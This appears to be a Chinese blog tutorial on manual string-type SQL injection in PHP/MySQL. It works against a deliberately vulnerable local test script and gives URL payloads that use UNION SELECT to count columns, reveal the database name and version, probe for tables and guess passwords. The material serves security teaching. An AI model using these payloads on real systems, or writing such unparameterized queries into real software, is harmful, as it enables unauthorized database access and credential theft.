SQL注入系列之PHP+Mysql手动注入(二)----字符型

一、什么是字符型注入以及原理

 

1)字符型注入简介

 

字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类型。

 

字符型注入就是把输入的参数当做字符串来对数据库进行查询,字符型注入在sql语句中都采用单引号括起来。

 
 
2)基本原理:

看看这条SQL语句

[html]  view plain  copy
 
  1. $query="select first_name from users where id='$_GET['id']'";  
这句SQL的语句就是基于用户输入的id在users表中找到相应的first_name,正常用户当然会输入例如1,2等等。但是如果有人输入这样的内容呢?

1' union select database() #;

这样的话这句SQL语句就变成了这样

select first_name from users where id='1'unionselect database()#'
 
这样的话,我们不仅可以得到id=1的first_name,还可以得到当前数据库的相关信息,这是开发人员所没有想到的。以上只是一个简单的SQL注入的例子。 

从根本上讲,当开发人员对用户的输入过滤不严,造成了用户可以通过输入SQL语句控制数据库,就会产生SQL注入漏洞。

 

 

简而言之,基于字符型的SQL注入即存在SQL注入漏洞的URL参数为字符串类型(需要使用单引号表示)。

 

 

字符型SQL注入的关键—–单引号的闭合

 

MySQL数据库对于单引号的规则如下:

  • 单引号必须成对出现,否则数据库就会报错。
  • 如果两个单引号之间内容为空,数据库自动忽略。

应用程序数据库的字符型SQL语句为:

  • select * from tables where idproduct=’13’;
  • select * from tables where name=’fendo’;
  • select * from tables where data=’01/01/2017’;

二、字符型注入与数字型注入的区别

 

 

字符:除数字之外都是字符

数字:0-9

 

两种SQL语句的区别:

 

数字型: SELECT 列 FROM 表 WHERE 数字型列=值
字符型: SELECT 列 FROM 表 WHERE 字符型列=’值’

 

三、如何判断是否是字符型注入

 

测试注入语句是:

 

xx' and '1'=1--' 


xx' and '1=2--'


如果第一个页面正常,而使用第二个的时候页面出现错误则,该url可以进行字符型注入

 

 

 

 

四、字符型注实战

 

测试源码:

 

[html]  view plain  copy
 
  1. <?  
  2. $name=$_GET['username'];  
  3. $conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库  
  4. if($conn){  
  5.     echo "连接数据库成功!";   
  6. }//判断连接是否成功  
  7. echo "<br>";  
  8. mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库(fendo)  
  9. $sql="select * from user where username = '$name'"; //字符型搜索语句  
  10. $result=mysql_query($sql);  
  11. while($row = mysql_fetch_array($result)){   
  12.     echo "用户ID:".$row['id']."<br >";  
  13.     echo "用户名:".$row['username']."<br >";  
  14.     echo "用户密码:".$row['password']."<br >";  
  15.     echo "用户邮箱:".$row['email']."<br >";  
  16. }  
  17. mysql_close($conn); //关闭数据库连接  
  18. echo "<hr>";  
  19. echo "你当前执行的sql语句为:"."<br >";  
  20. echo $sql;  
  21. ?>  

 

表数据:

 

 

 

当我们访问:http://localhost/sqltest/char.php?username=admin 时

 

 

执行的代码是:

 

 

[html]  view plain  copy
 
  1. $sql="select * from user where username = '$name'";  



 

解析成SQL就是 select  * from user where username = 'admin' 执行结果为

 

 

进行SQL注入:

 

1.猜字段数

 

使用union select 1,2,3,4.... 去猜。这里为4是正确说明字段数为4。

 

 

[html]  view plain  copy
 
  1. http://localhost/sqltest/char.php?username=admin' union select 1,2,3,4 and '1'='1  



 

 

爆出1,2,3 更换SQL语句得出当前的数据库名字与数据库版本

 

 

[html]  view plain  copy
 
  1. http://localhost/sqltest/char.php?username=admin' union select database(),version(),3,4 and '1'='1  



 

 

 

2.猜表名

 

获取表名使用 '+and+(select+count(*)+from+表名)>0+and+''=' 这种格式。

 

 

[html]  view plain  copy
 
  1. http://localhost/sqltest/char.php?username=admin'+and+(select+count(*)+from+user)>0+and+''='  



 

 

没报错说明存在user这个表。

 

3.猜密码

 

 

[html]  view plain  copy
 
  1. http://localhost/sqltest/char.php?username=admin' and password='fendo  


 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值